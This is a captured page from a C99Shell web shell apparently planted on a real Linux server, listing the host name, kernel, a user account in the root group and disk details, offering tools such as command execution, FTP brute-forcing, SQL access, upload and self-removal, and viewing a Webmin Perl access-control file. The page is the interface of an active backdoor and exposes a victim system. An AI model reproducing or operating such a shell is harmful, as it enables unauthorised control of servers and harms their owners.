!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/pap/   drwxr-xr-x
Free 28.66 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     acl_security.pl (925 B)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

require 'pap-lib.pl';

# acl_security_form(&options)
# Output HTML for editing security options for the pap module
sub acl_security_form
{
my ($o) = @_;

print &u_table_row($text{'acl_pages'},
    &ui_checkbox('mgetty', 1, $text{'mgetty_title'}, $o->{'mgetty'})."<br>\n".
    &ui_checkbox('options', 1, $text{'options_title'}, $o->{'options'})."<br>\n".
    &ui_checkbox('dialin', 1, $text{'dialin_title'}, $o->{'dialin'})."<br>\n".
    &ui_checkbox('secrets', 1, $text{'secrets_title'}, $o->{'secrets'})."<br>\n".
    &ui_checkbox('sync', 1, $text{'sync_title'}, $o->{'sync'}), 3);

print &ui_table_row($text{'acl_direct'},
    &ui_yesno_radio("direct", $o->{'direct'}));
}

# acl_security_save(&options)
# Parse the form for security options for the squid module
sub acl_security_save
{
my ($o) = @_;

foreach $a ('mgetty', 'options', 'dialin', 'secrets', 'sync') {
    $o->{$a} = $in{$a};
    }
$o->{'direct'} = $in{'direct'};
}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--